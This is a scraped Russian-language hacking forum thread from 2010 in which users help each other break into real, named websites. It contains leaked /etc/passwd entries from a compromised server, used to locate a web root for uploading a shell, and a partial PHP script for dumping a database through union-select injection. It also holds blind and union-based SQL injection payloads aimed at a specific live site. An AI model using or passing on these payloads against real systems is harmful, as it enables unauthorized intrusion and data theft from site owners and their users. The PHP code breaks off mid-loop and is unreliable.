HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15641  
Старый 17.11.2010, 12:56
freezed
Guest
Сообщений: n/a
Провел на форуме:
31258

Репутация: 7
По умолчанию

Цитата:
Сообщение от Gorev  
Gorev said:
/etc/httpd/conf/httpd.conf
/usr/apache/httpd.conf
и так далее и тому подобное..тебе эти файлы о чем нибудь говорят ? в /etc/passwd очень редко путь абсолютный я находил..
мне говорят, но я же сначала глянул на этот сайт, а ты просто сумничать решил, тут, видимо, как раз тот редкий случай, когда в пассвд есть путь, а в хттпд.конф нет:

Код:
Code:
flash.dvd-photo-slideshow.com:x:502:48:flash.dvd-photo-slideshow.com:/var/www/flash.dvd-photo-slideshow.com:/sbin/nologin
jp.flash-slideshow-maker.com:x:503:48::/var/www/jp.flash-slideshow-maker.com:/sbin/nologin
m4p-mp3.tuneclone.com:x:504:48::/var/www/m4p-mp3.tuneclone.com:/sbin/nologin
skyalbum.com:x:505:48::/var/www/skyalbum.com:/sbin/nologin
 
Ответить с цитированием

  #15642  
Старый 17.11.2010, 12:58
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от freezed  
freezed said:
мне говорят, но я же сначала глянул на этот сайт, а ты просто сумничать решил, тут, видимо, как раз тот редкий случай, когда в пассвд есть путь, а в хттпд.конф нет:
Код:
Code:
flash.dvd-photo-slideshow.com:x:502:48:flash.dvd-photo-slideshow.com:/var/www/flash.dvd-photo-slideshow.com:/sbin/nologin
jp.flash-slideshow-maker.com:x:503:48::/var/www/jp.flash-slideshow-maker.com:/sbin/nologin
m4p-mp3.tuneclone.com:x:504:48::/var/www/m4p-mp3.tuneclone.com:/sbin/nologin
skyalbum.com:x:505:48::/var/www/skyalbum.com:/sbin/nologin
придержи-ка свой язык..ты шелл залей по этому пути, потом вякай..
 
Ответить с цитированием

  #15643  
Старый 17.11.2010, 13:01
freezed
Guest
Сообщений: n/a
Провел на форуме:
31258

Репутация: 7
По умолчанию

Цитата:
Сообщение от Gorev  
Gorev said:
придержи-ка свой язык..ты шелл залей по этому пути, потом вякай..
а при чем тут шелл? вопрос был в том, чтобы найти абсолютный путь, я подсказал, он указан в /etc/passwd, а папку с правами на запись уж пусть сам дальше ищет

что ж ты нервный-то такой
 
Ответить с цитированием

  #15644  
Старый 17.11.2010, 13:07
Unknown
Guest
Сообщений: n/a
Провел на форуме:
34733

Репутация: 83
По умолчанию

Цитата:
Сообщение от freezed  
freezed said:
а при чем тут шелл? вопрос был в том, чтобы найти абсолютный путь, я подсказал, он указан в /etc/passwd, а папку с правами на запись уж пусть сам дальше ищет
что ж ты нервный-то такой
Не спорьте с Gorev. Он прав. И прекращайте флудить.
 
Ответить с цитированием

  #15645  
Старый 17.11.2010, 13:08
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Фараон  
Фараон said:
Не спорьте с
Gorev
. Он прав.
Не всегда.
 
Ответить с цитированием

  #15646  
Старый 17.11.2010, 13:30
Чакэ
Guest
Сообщений: n/a
Провел на форуме:
90728

Репутация: 62
По умолчанию

Цитата:
Сообщение от pinch  
pinch said:
посоветуйте программу или скрипт для слива бд. Чтоб прога сливала через where+id
http://site.ru/news.php?id=1+union+select+1,2,name,4+from+users+w here+id={index}--
а не через limit.
можно такой примитив заюзать например

[PHP]
PHP:
[COLOR="#000000"]functionololo($url,$proxy='127.0.0.1')

{

$ch=curl_init($url);

curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

curl_setopt($ch,CURLOPT_PROXY,$proxy);

$content=curl_exec($ch);

curl_close($ch);

return
$content;

}

$num='1000';// максимальный id

$regex='~(.*?)~';//ну ты понел

$f=fopen('db','a+');

for(
$i=0;$i[COLOR="#007700"]
 
Ответить с цитированием

  #15647  
Старый 18.11.2010, 14:16
lostelacoste
Guest
Сообщений: n/a
Провел на форуме:
283

Репутация: 0
По умолчанию

http://www.bookmg.ru/news/post/id.15'

можно ли раскрутить?
 
Ответить с цитированием

  #15648  
Старый 18.11.2010, 15:33
freezed
Guest
Сообщений: n/a
Провел на форуме:
31258

Репутация: 7
По умолчанию

Цитата:
Сообщение от lostelacoste  
lostelacoste said:
http://www.bookmg.ru/news/post/id.15'
можно ли раскрутить?
как слепую точно можно:

true:

http://www.bookmg.ru/news/post/id.15+and+1=1

http://www.bookmg.ru/news/post/id.15+and+substring(@@version,1,1)='M'

http://www.bookmg.ru/news/post/id.15+and+(select+system_user)='sa'

false:

http://www.bookmg.ru/news/post/id.15+and+1=0
 
Ответить с цитированием

  #15649  
Старый 18.11.2010, 16:50
Hideofangel
Guest
Сообщений: n/a
Провел на форуме:
2498

Репутация: 2
По умолчанию

Мог бы кто не будь рассказать или дать ссылки на русское описание по использованию(или видео) JBroFuzz?

Был бы весьма признателен.

P.S.Видео от создателей видел(OWASP),но может есть от наших умельцев.
 
Ответить с цитированием

  #15650  
Старый 18.11.2010, 18:43
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Код:
Code:
http://www.bookmg.ru/news/post/id.-15 union all select @@version,null,null,null,null--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ